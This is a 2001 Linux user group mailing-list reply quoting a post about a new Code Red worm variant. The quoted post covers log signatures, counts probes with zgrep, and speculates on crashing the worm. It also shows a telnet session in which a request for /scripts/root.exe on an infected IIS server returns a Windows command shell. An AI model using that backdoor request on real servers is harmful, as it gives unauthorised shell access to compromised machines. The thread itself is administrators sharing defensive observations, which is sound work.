[Gllug] New Code Red /default.ida?XXXXXXXXXXXX
Axel Segebrecht
alexander at smatrix.de
Sun Aug 5 22:32:59 UTC 2001
now that you are mentioning it... had several 'attacks' and noticed
a slow down in speed... hmm - grrrrrrrrrrrrrr!!!!!!!
never mind - let's all go and call the g.busters then
rg, Axel Segebrecht
Me = http://smatrix.de/index.html
Radio = http://213.123.256.54:8000/
--
"reality? what reality!"
"Sometimes," continued Gallagher, "all the storage capacity in the world
isn't enough to make a computer feel good about itself."
"I've been here all morning and my heart's only beaten six times!"
> -----Original Message-----
> From: gllug-admin at linux.co.uk [mailto:gllug-admin at linux.co.uk]On Behalf
> Of Rev Simon Rumble
> Sent: 05 August 2001 23:19
> To: gllug at linux.co.uk
> Subject: [Gllug] New Code Red /default.ida?XXXXXXXXXXXX
>
>
> There's a new variant of the Code Red worm around now. The most
> noticable difference is the log entries are now:
> /default.ida?XXXXXXXXXXXX...
>
> Where previously they were:
> /default.ida?NNNNNNNNNNNN...
>
> See this site for more:
> http://incidents.org
>
> It appears to be spreading more rapidly. I've had more probes from
> this one already than I have had for the original:
>
> (taz-simon) [08:10:26] /home/rumble/www_logs$ zgrep
> "default.ida?X" * |wc -l
> 172
> (taz-simon) [08:11:02] /home/rumble/www_logs$ zgrep
> "default.ida?N" * |wc -l
> 131
>
> I've been told that you can cause a buffer overflow in the virus
> itself, causing it to hang, by sending too much data to the virus.
> Does anyone know if this is true? If it is true, simply linking
> default.ida to something large, say your kernel source, could disable
> it on some machines at least.
>
> This new variant has a nice remotely exploitable backdoor once
> installed. You can get to a shell through the web server, though
> talking to it once you get there is beyond me:
>
> telnet xxx.xxx.xxx.xx 80
> Trying xxx.xxx.xxx.xx...
> Connected to xxx.xxx.xxx.xx.
> Escape character is '^]'.
> GET /scripts/root.exe HTTP/1.0
>
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.0
> Date: Sun, 05 Aug 2001 21:59:25 GMT
> Content-Type: application/octet-stream
> Microsoft Windows 2000 [Version 5.00.2195]
> (C) Copyright 1985-1999 Microsoft Corp.
>
> c:\inetpub\scripts>
>
> --
> Rev Simon Rumble <simon at rumble.net>
> www.rumble.net
>
> --
> Gllug mailing list - Gllug at linux.co.uk
> http://list.ftech.net/mailman/listinfo/gllug
--
Gllug mailing list - Gllug at linux.co.uk
http://list.ftech.net/mailman/listinfo/gllug
More information about the GLLUG
mailing list